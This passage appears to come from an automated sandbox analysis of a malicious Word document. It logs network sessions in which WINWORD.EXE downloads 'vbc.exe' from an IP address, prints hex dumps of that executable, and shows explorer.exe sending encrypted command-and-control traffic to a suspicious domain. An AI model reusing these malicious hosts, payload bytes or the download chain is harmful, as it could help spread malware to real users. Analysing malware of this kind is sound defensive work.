27 21 32 3a 29 37 3d 5f 3f 5d 3f 30 b5 27 35 3a 5e 3b 2b b5 3f 2f 5e 26 2d 28 35 37 60 32 40 2b 31 36 3f 37 36 5d 3d 23 31 2c 33 2f 3f a7 2b 2d 36 33 3e 3f 24 26 7c 33 7c 2c 40 25 2c 3f 31 3b 2f 25 35 7c 36 34 25 25 2c 3f 31 37 3f 29 3f 60 3f 31 26 32 37 3f 31 2f 26 5e 2a b5 27 3f 40 25 25 26 5e 3f 30 b5 38 2b 3f 2b 28 2a 3f 2c 27 5d 2c 25 3c 25 a7 5f 24 2d 2f 31 3f 2c 2a 60 21 40 37 3c 3f 32 5e 5d 25 24 2d 3a 2d b5 39 3f 36 3d 3f 60 a7 60 3b 33 35 2f 3c 60 27 b0 31 34 3f 3f b0 40 3f 5f 24 30 25 28 7c 2a 2d 3f 31 2d 60 24 30 37 26 24 3a 27 28 2d 2e 28 5b 24 2b 3e 36 3c 33 3d 3c a7 2b 2f b0 24 23 2a 7c a7 5f 2e 3c a7 39 3f 5e 2b 3a 3b 2d 33 30 36 40 b5 38 28 7e a7 3f 7c 2f 30 38 a7 34 29 27 23 2e 34 3f 31 25 5f 3f 31 60 3f 3c 39 3e 2b 7e 25 b5 5f 3e 26 7c 29 29 38 30 2f 29 7c 3a 32 3f 21 7c 36 26 27 3c 2c 3f 30 30 2c 2c 34 30 3c 5b 27 32 3d 40 2c 21 35 25 35 29 27 5f 5f 3c 5f 3f 7c 7c 38 3f 5f 25 b5 7c 35 b0 3f 3b 27 a7 3b 28 3b 5d 21 3d 25 26 25 3f 28 2d 21 37 5d 3f 25 23 3f 28 7e 37 25 2e 3d 3e 3f 3e 36 2a 35 2f 3f 31 3f 7c 3f 60 3a
                                                                                Data Ascii: {\rt{\mcSp337887461 \}{\9541841103@10-<!:!*%:|@>+,1!&5/[]~>*?/,~03=?9377?]=.4,9$:4)-?_[[2>!%66_$_[4-|$6?|]7?;4?>7?3|(23)(9?%9%<-1@?+9!::8`.+?;5~(^734;!7[~,?%:82+?/.?`$;%(*%9`*0*?03]|*?~[?[9*8[]4$^/!8$?$?23;4.9'#2(|_?.-/.5['102'!<8%`7%%*6~?^7#30'?./~`@]64[3;#+=(=&3527?]+,(@'72_/,]2?8.#:/^-2++-;0$;,<$9?;7?%|[>^@6[#79||9)$%6.?[94?/4?0[3,-,<5?</87~;?[7%?!1?`~$^46[^3,@:=^4__!9([?*,/($5:'|+&73<=[25:#@|5>'%%1(]?7+6@+?.7=@+^74>??|5%0??1;%(`11)!3@?<^+6<&09<.^1)^-=(@[5=19&?,7@4?*?)-,-_??<,#!+6&]?*~7),#(0^;~#1!@+]?/*$%%91#1?%.5'??*?/@6@,+7%<?,_6*0.|.)?>~*<2328<&/?+@?'!2:)7=_?]?0'5:^;+?/^&-(57`2@+16?76]=#1,3/?+-63>?$&|3|,@%,?1;/%5|64%%,?17?)?`?1&27?1/&^*'?@%%&^?08+?+(*?,'],%<%_$-/1?,*`!@7<?2^]%$-:-9?6=?``;35/<`'14??@?_$0%(|*-?1-`$07&$:'(-.([$+>6<3=<+/$#*|_.<9?^+:;-306@8(~?|/084)'#.4?1%_?1`?<9>+~%_>&|))80/)|:2?!|6&'<,?00,,40<['2=@,!5%5)'__<_?||8?_%|5?;';(;]!=%&%?(-!7]?%#?(~7%.=>?>6*5/?1?|?`:
                                                                                Nov 22, 2022 05:08:13.230066061 CET3INData Raw: 2e 3f 3c a7 60 5d 36 23 37 3b 38 3d 23 5b 35 38 b5 40 5f 3d 2f 39 3f 32 27 32 25 32 25 36 2f 3d 3d 2e 38 5f 2f 27 7c 3f 2e 3f 5e 32 7e 26 3c 3d 27 24 29 37 2c 60 39 24 25 2b 32 3f 3b 3b 3b 36 3f 26 32 3f b0 b5 3f 26 a7 24 29 60 5d 3f 30 39 37 a7
                                                                                Data Ascii: .?<`]6#7;8=#[58@_=/9?2'2%2%6/==.8_/'|?.?^2~&<='$)7,`9$%+2?;;;6?&2??&$)`]?097;<-?/%.$/~_#@>^?;4,#?/:-7?.6(4<1!;->-6_)-1''`/#)66#/+9'549608%<4?,2$%!#!??|*$'1,?<-9$]1%1;??(991?:??6=?*?`|<<?-?/2.??=)?8.%/:~):9(,(77-#<==^~)~3%56
                                                                                Nov 22, 2022 05:08:13.230109930 CET5INData Raw: 33 30 32 0a 0d 0a 30 30 0a 0a 0a 30 30 30 30 30 37 30 0a 20 5c 62 69 6e 30 30 30 0d 0a 0a 30 30 20 30 30 0a 0a 0a 30 20 33 34 09 36 66 36 0a 0a 0a 39 09 35 09 38 34 33 36 62 09 30 30 30 30 30 09 30 0d 0a 0a 30 0d 0a 0a 30 30 09 30 30 0d 0a 0a 30
                                                                                Data Ascii: 302000000070 \bin00000 000 346f6958436b000000000000 0000 000 0100000d0cf11e0a1b11ae1000000000000000000000000000000003e000 300 feff 090006 0 000 0 000
                                                                                Nov 22, 2022 05:08:13.230143070 CET6INData Raw: 0d 0d 0a 66 0d 0d 0a 66 20 66 66 0a 0a 0a 66 20 66 0a 0a 0a 66 0a 0d 0a 66 20 66 66 09 66 0a 0d 0a 66 0d 0d 0a 66 09 66 66 66 66 66 0a 0d 0a 66 0d 0a 0a 66 0a 0a 0a 66 66 20 66 0a 0a 0a 66 66 66 0a 0a 0a 66 0d 0a 0a 66 20 66 66 0a 0a 0a 66 66 66
                                                                                Data Ascii: ff fff fff ffffffffffffff ffffff ffffffff fffff ffffffff fffff ffffffffffffffffffffffffffff ff fffffff fffffff fffff ffff
                                                                                Nov 22, 2022 05:08:13.230253935 CET7INData Raw: 09 66 66 66 66 09 66 66 09 66 66 66 09 66 66 09 66 0a 0a 0d 66 0d 0a 0d 66 0a 0a 0d 66 66 66 66 66 0a 0a 0d 66 66 09 66 66 0d 0d 0a 66 09 66 09 66 0a 0d 0a 66 66 20 66 66 66 66 66 0d 0a 0d 66 66 66 66 66 0d 0a 0d 66 66 66 66 66 66 20 66 66 0d 0a
                                                                                Data Ascii: ffffffffffffffffffffffffffff ffffffffffffffff fffff ff ffffffff fffffffffffffffffffffffffffffffffffffffffffffffffffffff f fffff f
                                                                                Nov 22, 2022 05:08:13.230288982 CET9INData Raw: 66 66 66 0d 0d 0d 66 09 66 66 66 66 66 66 09 66 0a 0d 0d 66 66 0d 0d 0d 66 66 09 66 0a 0d 0d 66 09 66 66 09 66 66 66 66 66 66 66 66 09 66 66 66 09 66 66 66 66 0d 0d 0d 66 66 66 20 66 20 66 66 66 66 66 66 20 66 66 66 66 66 09 66 0d 0d 0d 66 66 66
                                                                                Data Ascii: fffffffffffffffffffffffffffffffffffff f ffffff ffffffffffffffff ff f ff fffffffffffff f f ffff f ffffffff f ff f ff fffffffffff ffffffffffffff ffff
                                                                                Nov 22, 2022 05:08:13.230321884 CET10INData Raw: 30 30 30 09 30 30 0d 0a 0d 30 30 30 30 0d 0a 0d 30 0d 0a 0d 30 30 30 30 30 30 30 30 30 09 30 30 0a 0a 0d 30 09 30 30 30 30 30 30 0a 0d 0d 30 30 30 30 30 30 09 30 30 30 09 30 30 09 30 20 30 0a 0d 0d 30 65 0d 0d 0d 66 20 30 36 30 30 30 30 30 30 0d
                                                                                Data Ascii: 0000000000000000000000000000000000000000 00ef 060000000000 0 0 000 000000000 0 0 0 00 00 000000 00000000000000000000000000000000000000000000 0 0000
                                                                                Nov 22, 2022 05:08:13.230355024 CET11INData Raw: 0d 38 0d 0d 0d 30 30 20 30 30 30 0a 0d 0d 30 0d 0d 0d 30 20 39 30 30 20 30 0d 0d 0d 30 30 30 0d 0d 0d 30 20 61 30 30 30 0d 0d 0d 30 30 0a 0d 0a 30 09 30 62 09 30 0a 0d 0a 30 09 30 09 30 20 30 30 30 63 30 30 0a 0d 0a 30 20 30 30 20 30 20 30 0a 0d
                                                                                Data Ascii: 800 00000 900 00000 a0000000b0000 000c000 00 0 0d 00000 00 e0 0 00 000f0000001000000011000000120 0 00001 30000001 4000000150 000001600
                                                                                Nov 22, 2022 05:08:13.230386972 CET13INData Raw: 0d 0a 0d 66 20 66 66 0a 0a 0d 66 66 66 0a 0d 0d 66 66 66 66 0a 0a 0d 66 0a 0d 0d 66 66 20 66 20 66 0a 0d 0d 66 66 20 66 20 66 09 66 09 66 0a 0d 0d 66 66 66 20 66 20 66 66 66 66 09 66 09 66 66 66 66 0a 0d 0d 66 0a 0d 0d 66 66 09 66 09 66 0a 0a 0d
                                                                                Data Ascii: f ffffffffffff f fff f ffffff f ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff fffffffff ffff
                                                                                Nov 22, 2022 05:08:13.230422020 CET14INData Raw: 0a 0a 0a 34 09 63 09 61 33 09 36 09 37 62 09 34 31 31 09 38 62 0d 0a 0a 39 36 32 36 0a 0a 0a 64 0a 0a 0a 62 63 0a 0d 0a 61 30 35 38 34 0a 0d 0a 64 61 35 35 0a 0d 0a 32 30 33 61 09 30 09 62 31 34 63 09 66 64 35 09 61 63 09 37 0a 0d 0a 36 09 37 33
                                                                                Data Ascii: 4ca367b4118b9626dbca0584da55203a0b14cfd5ac7673d0a98d561ce9 d701000085b733499ce3a33d06c9984239c32bf039b022fce3313c8124ed6b4543ce1
                                                                                Nov 22, 2022 05:08:13.347867966 CET15INData Raw: 20 61 65 30 20 36 31 66 64 0d 0d 0a 63 0a 0d 0a 35 64 20 62 20 31 0d 0d 0a 30 20 65 20 66 20 63 33 0d 0d 0a 66 64 64 38 0d 0d 0a 31 20 38 32 0d 0d 0a 30 63 33 0d 0d 0a 32 20 37 0d 0d 0a 62 20 64 36 0d 0d 0a 39 0a 0d 0a 38 32 62 62 20 39 20 35 0a
                                                                                Data Ascii: ae0 61fdc5d b 10 e f c3fdd81 820c32 7b d6982bb 9 59225506998996 69 9c9366701c260 c6fc58febbd 78beb5f38e8 9b22f0b e5fc52f 131c2466d6c 8932277b6 8c676664


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.2249172192.227.132.4980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 22, 2022 05:08:15.608422995 CET21OUTGET /179/vbc.exe HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: 192.227.132.49
                                                                                Connection: Keep-Alive
                                                                                Nov 22, 2022 05:08:15.728528023 CET23INHTTP/1.1 200 OK
                                                                                Date: Tue, 22 Nov 2022 04:08:15 GMT
                                                                                Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
                                                                                Last-Modified: Mon, 21 Nov 2022 22:01:53 GMT
                                                                                ETag: "2ee00-5ee0233fe2eac"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 192000
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-msdownload
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 f5 4c e1 bc 94 22 b2 bc 94 22 b2 bc 94 22 b2 a2 c6 b7 b2 a1 94 22 b2 a2 c6 a1 b2 3c 94 22 b2 9b 52 59 b2 bb 94 22 b2 bc 94 23 b2 27 94 22 b2 a2 c6 a6 b2 93 94 22 b2 a2 c6 b6 b2 bd 94 22 b2 a2 c6 b3 b2 bd 94 22 b2 52 69 63 68 bc 94 22 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5b fa 66 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 98 01 00 00 ac 17 00 00 00 00 00 07 6d 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 40 19 00 00 04 00 00 07 ea 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 99 01 00 50 00 00 00 00 00 19 00 a8 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 3b 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2a 97 01 00 00 10 00 00 00 98 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 46 17 00 00 b0 01 00 00 1a 01 00 00 9c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 37 00 00 00 00 19 00 00 38 00 00 00 b6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$L""""<"RY"#'""""Rich"PEL[fbm@@P7;@<.text* `.dataF@.rsrc78@@
                                                                                Nov 22, 2022 05:08:15.728578091 CET24INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c a3 01 00 00 00 00 00 80 9c 01 00 8e 9c
                                                                                Data Ascii: 0H^p.D^r,HZn|h
                                                                                Nov 22, 2022 05:08:15.728610039 CET25INData Raw: 69 00 66 00 69 00 77 00 65 00 62 00 69 00 70 00 75 00 72 00 65 00 6a 00 65 00 7a 00 00 00 67 69 74 75 6a 6f 6c 6f 63 65 6c 65 6d 65 67 69 6e 61 6e 65 67 65 64 61 6d 6f 64 65 68 65 79 00 44 00 65 00 66 00 20 00 76 00 61 00 76 00 61 00 64 00 75 00
                                                                                Data Ascii: ifiwebipurejezgitujolocelemeginanegedamodeheyDef vavadukucupukubuloxasewijir zuhajelijazupohijife xajeporukojesuboxnapepelicodovefajalofelakulahelunemuj
                                                                                Nov 22, 2022 05:08:15.728640079 CET26INData Raw: 00 00 00 00 00 ec e9 3f 00 00 00 00 00 9a e9 3f 00 00 00 00 00 9a e9 3f 00 00 00 00 00 48 e9 3f 00 00 00 00 00 48 e9 3f 00 00 00 00 00 fa e8 3f 00 00 00 00 00 fa e8 3f 00 00 00 00 00 ac e8 3f 00 00 00 00 00 ac e8 3f 00 00 00 00 00 62 e8 3f 00 00
                                                                                Data Ascii: ???H?H?????b?b???????F?F???????B?B????
                                                                                Nov 22, 2022 05:08:15.728677034 CET28INData Raw: 31 3d 00 60 03 28 04 4a d9 3f 44 6b 8c b0 bc e7 30 3d 00 68 bf f4 23 f1 d9 3f 1f 40 f2 15 20 89 36 3d 00 80 db ab fc 99 da 3f 11 a3 87 5f 9c e8 11 3d 00 88 14 7c 97 44 db 3f db 26 b5 3f 34 6a 3c 3d 00 18 27 9e cd ea db 3f 51 9b 87 db 6e 8a 26 3d
                                                                                Data Ascii: 1=`(J?Dk0=h#?@ 6=?_=|D?&?4j<='?Qn&=?l=6?DX,4=?-Q2=xbt?WE<.l?7w,=?l>=%?Nl,"=@\r??t8=85R?=L.?>)g=
                                                                                Nov 22, 2022 05:08:15.728708982 CET29INData Raw: 73 70 61 63 65 20 66 6f 72 20 6c 6f 63 61 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0d 0a 00 00 00 00 00 00 52 36 30 33 31 0d 0a 2d 20 41 74 74 65 6d 70 74 20 74 6f 20 69 6e 69 74 69 61 6c 69 7a 65 20 74 68 65 20 43 52 54 20 6d 6f 72 65 20 74 68
                                                                                Data Ascii: space for locale informationR6031- Attempt to initialize the CRT more than once.This indicates a bug in your application.R6030- CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio
                                                                                Nov 22, 2022 05:08:15.728743076 CET31INData Raw: 72 27 00 00 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 41 72 72 61 79 27 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 00 20 54 79 70 65 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 60 6c 6f 63 61 6c 20 73
                                                                                Data Ascii: r' Base Class Array' Base Class Descriptor at ( Type Descriptor'`local static thread guard'`managed vector copy constructor iterator'`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit d
                                                                                Nov 22, 2022 05:08:15.728775978 CET32INData Raw: 73 74 72 69 63 74 00 00 5f 5f 70 74 72 36 34 00 5f 5f 63 6c 72 63 61 6c 6c 00 00 00 5f 5f 66 61 73 74 63 61 6c 6c 00 00 5f 5f 74 68 69 73 63 61 6c 6c 00 00 5f 5f 73 74 64 63 61 6c 6c 00 00 00 5f 5f 70 61 73 63 61 6c 00 00 00 00 5f 5f 63 64 65 63
                                                                                Data Ascii: strict__ptr64__clrcall__fastcall__thiscall__stdcall__pascal__cdecl__based(4.@,.@ .@.@.@-@-@-@-@-@(@)@(@(@(@(@-@-@-@-@-@-@-@-@-@-@-@-@-@-@-@-@|-@x-@t-@p-@l-@
                                                                                Nov 22, 2022 05:08:15.728801012 CET33INData Raw: 20 00 20 00 28 00 28 00 28 00 28 00 28 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 48 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00
                                                                                Data Ascii: ((((( H
                                                                                Nov 22, 2022 05:08:15.728826046 CET35INData Raw: 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd
                                                                                Data Ascii:
                                                                                Nov 22, 2022 05:08:15.846160889 CET36INData Raw: 00 00 c0 3c 40 00 74 b2 42 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 14 3d 40 00 00 00 00 00 00 00 00 00 01 00 00 00 24 3d 40 00 f8 3c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 b2 42 00 40 3d 40 00 00 00 00 00
                                                                                Data Ascii: <@tB@=@$=@<@B@=@P=@\=@<@B@@=@B=@=@=@\=@<@B@=@B=@


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4192.168.2.224917334.174.217.4280C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 22, 2022 05:09:02.822102070 CET225OUTPOST / HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Accept: */*
                                                                                Referer: http://ygujr.net/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                Content-Length: 115
                                                                                Host: esplogem.ga
                                                                                Nov 22, 2022 05:09:02.822102070 CET226OUTData Raw: 05 98 b3 99 cb 07 0e f3 a4 3f 35 ee 2b fc 9d 3c 01 7f c9 02 3b 98 8a ce a1 82 b6 33 50 7a 54 d5 5c 1a 95 c7 b5 f0 24 dc 60 a5 32 f7 8b b1 ec 29 42 64 65 a0 31 c3 2e ed 78 47 29 1a 39 ba ac 2e ee c6 e7 6b 10 95 10 0f c5 6d 19 19 aa ea 27 9b 1f ca
                                                                                Data Ascii: ?5+<;3PzT\$`2)Bde1.xG)9.km'%A[{ZYKA`FTr
                                                                                Nov 22, 2022 05:09:03.278237104 CET227INHTTP/1.1 404 Not Found
                                                                                date: Tue, 22 Nov 2022 04:09:03 GMT
                                                                                server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                                x-powered-by: PHP/5.6.40
                                                                                transfer-encoding: chunked
                                                                                content-type: text/html; charset=utf-8
                                                                                Data Raw: 33 36 31 46 0d 0a 83 00 00 00 43 d9 e9 67 f9 8a bc 50 ea 4c 51 91 d6 29 e0 35 74 13 23 63 3f 01 a6 a1 ef e5 c6 96 63 a4 a7 9c 1a de 8a 41 78 5f 5b d9 71 8f 1d ba 31 d0 ef ea dd ce 35 06 0c 77 d1 08 a6 c2 1b ed 94 1c 33 4d 6b 6d 8f 2e 10 28 ba 06 37 84 5e 1d 6d 30 f2 c6 23 87 82 1e ad 36 a0 c3 a8 da 56 ee 16 a7 00 76 17 ad 8b 47 f9 53 1f 44 3f f7 bf f2 da 5a ad a7 e2 a5 cb 9b 82 f6 11 c4 ab 1f 3c 07 b6 da 2a a7 b2 32 5e 00 a0 b6 04 00 56 72 5d 16 09 02 02 00 07 00 9e 03 00 00 69 75 a3 8a ef df d6 e3 ce bf 7c 65 48 15 1c 00 ed 7b e5 fe df 7c 37 06 83 f0 c1 4d 79 11 ee 0a 9a cf 6d eb 88 18 29 3f 11 53 fe 9b b6 21 2e a0 1d 3b f2 18 9a e2 ef 0c a6 12 63 36 c6 50 8f 8f 5d 2d 68 4f 5c ba 9a cb b7 8a 9f 4a 2a 5a fd ae 50 23 35 e0 c9 c2 09 a8 61 cf 70 ad a0 66 05 1f 41 7b b6 69 22 63 ee 76 7d fc 19 60 22 87 ac 19 2f 4f d5 64 4f 16 b5 35 c8 b9 71 d2 02 15 2e ad 59 13 c1 59 2d a0 c0 b2 9f 7c 02 cd cc 22 4a ad b6 06 a2 23 0d 79 09 68 09 9d dc 98 2c 74 8e ff 3f d8 3f 4f 61 1a 13 ff 37 9b 81 27 b9 71 21 5c 9a e8 c2 0b 99 a8 f7 27 83 d4 8f fa e2 a7 5d c4 72 1d 02 44 42 0f 3a fd 16 71 59 66 7a 37 99 1b 01 04 45 8b 58 13 d4 47 ff cb 32 ce 92 a7 18 5f 66 18 44 10 92 c3 34 5d c9 29 32 7e 64 26 bb c8 e4 ed e0 21 d2 80 23 be 08 c2 82 97 f3 b9 a1 77 01 d4 1d fd 70 d2 9e eb b6 52 3b 7a 14 2a af e5 39 a1 81 9c 68 74 21 4c 16 5b 0b 10 fb 9c d5 d1 bb d2 24 a9 4b 94 14 36 3f 7e 35 c5 7f 70 6b 11 51 da 50 91 41 5b 6e 41 d7 66 27 9a 73 30 8a 76 38 20 18 d9 35 1e e0 29 05 b5 ba 7c e8 41 d1 b6 84 9e d5 34 65 94 89 9b 1b 5f 67 c3 5e f3 a0 a2 5e 4e 6c 52 be e4 9d da f4 81 cd 45 1b 92 8e 85 5e 0d 25 29 e9 14 83 d3 78 d6 92 8e c7 e3 74 e7 b6 df 94 d6 18 11 4e 49 91 45 e9 58 68 d3 c8 89 8c 04 84 64 59 e6 6f 79 e1 fc c7 a3 39 e0 41 77 e8 c9 f6 4a 13 34 7e e3 2b 47 ab 42 54 a5 02 c3 1b 6e 57 a1 e8 c3 4b e5 74 42 e7 e9 5b af 94 e7 1b f2 c8 e5 96 4f 9c 72 e4 b9 75 20 fa 2a be 90 7c 1e bf 1e 3b 45 2b c7 44 21 af 8b 1c 90 71 04 1a 82 3e ed 90 36 2d 0f 50 68 08 cb 59 3d e9 a7 cb 09 37 e4 5e 71 27 a9 68 44 61 b7 33 4b 57 4c 39 e0 31 62 8b fd 1e 3d 6a 34 f8 e0 87 b9 61 10 38 e8 5a 79 0e 7f 2a e5 23 39 02 c6 58 b1 30 67 88 d7 65 ab eb e2 34 f2 52 aa 10 c2 36 e5 fc 72 2b 47 57 ff 28 f9 4c d2 f4 bf fd cd 8a c2 37 32 5c 3e da d3 aa bb b3 53 9b 59 c2 8e b3 bf f8 64 7f ab 0e 90 25 57 96 29 5b b9 a4 da db 50 6d 4c 8c 74 71 25 a2 f7 6c 30 5f 89 3a 06 6d 0b f1 f9 bb 6b 89 47 13 79 b1 1f 29 5d 1a c3 15 87 0b 91 6a 4a 68 00 3d 83 21 06 ee 82 29 58 dd fb 9f d0 d2 15 9d b7 f0 92 18 e5 8e fa 4c 86 15 75 de 5a ef 95 b6 cd 30 6f 33 ac af 2d 5b 93 10 f4 ab 4d ca c5 6c f3 c9 c7 13 1f f0 dd ef 1c 84 4f c1 34 2d a1 6f e4 49 00 68 90 6c 2a 5a 9c 41 92 e5 56 94 1e 24 ef 0f 2e ff c0 91 74 86 fb 21 61 1c 39 f3 24 c9 aa 0e c8 72 46 1a a7 01 6e 5b e6 28 e7 73 a7 b0 26 b9 b0 4c 37 cd 1c 28 e5 41 d3 7a 66 a4 dd fd 2b 65 06 a6 13 77 f0 0d 95 40 0a 65 4e 5e 11 8c 5c ae bf e2 ee 99 4e 47 58 3b 96 c0 b5 f3 e3 91 ce d3 5a 00 39 12 8d 30 ce 9d 6e 77 e2 d6 5f 47 a2 ec 39 ac de 82 8c a3 07 58 95 38 c6 1a a8 25 87 cf cc 03 7a 3c f7 cb 35 d9 b0 e8 0a 32 9f b1 0d 95 73 51 73 a1 13 9d 7a a9 e8 14 04 da b4 d4 a3 ce 61 e4 3b 92 b5 97 9b 3a 62 42 0f 54 1b 99 82 c9 8d 77 8d b2 5e f8 44 6f d3 76 a0 3a 97 46 69 dc 2b 4e 64 23 d7 5c b9 95 ea 7f fd 84 27 08 a8 e3 d8 50 30 b3 16 d1 16 68 cb 0e
                                                                                Data Ascii: 361FCgPLQ)5t#c?cAx_[q15w3Mkm.(7^m0#6VvGSD?Z<*2^Vr]iu|eH{|7Mym)?S!.;c6P]-hO\J*ZP#5apfA{i"cv}`"/OdO5q.YY-|"J#yh,t??Oa7'q!\']rDB:qYfz7EXG2_fD4])2~d&!#wpR;z*9ht!L[$K6?~5pkQPA[nAf's0v8 5)|A4e_g^^NlRE^%)xtNIEXhdYoy9AwJ4~+GBTnWKtB[Oru *|;E+D!q>6-PhY=7^q'hDa3KWL91b=j4a8Zy*#9X0ge4R6r+GW(L72\>SYd%W)[PmLtq%l0_:mkGy)]jJh=!)XLuZ0o3-[MlO4-oIhl*ZAV$.t!a9$rFn[(s&L7(Azf+ew@eN^\NGX;Z90nw_G9X8%z<52sQsza;:bBTw^Dov:Fi+Nd#\'P0h
                                                                                Nov 22, 2022 05:09:03.278316021 CET228INData Raw: 1e e7 64 fb 48 f7 33 46 ba d0 16 78 c6 b3 d6 c1 5e 49 4b 85 03 66 b9 dd 5d 78 cf 16 ea 99 ce e1 35 ea f8 b3 b7 7a cb cc c3 20 d0 ea 3a 57 72 1c b9 ec 47 ca a2 3b 18 c4 03 28 f6 f4 4e 04 77 82 85 1f bd aa 35 4a fb de cd 19 d8 e2 1f 7e 47 68 83 bd
                                                                                Data Ascii: dH3Fx^IKf]x5z :WrG;(Nw5J~Gh|.b$XM6+3,^wD|l0W:lmHL!+oF/*rcSQ:_>HCzG^PY<,AzSulomR/^HRh{H
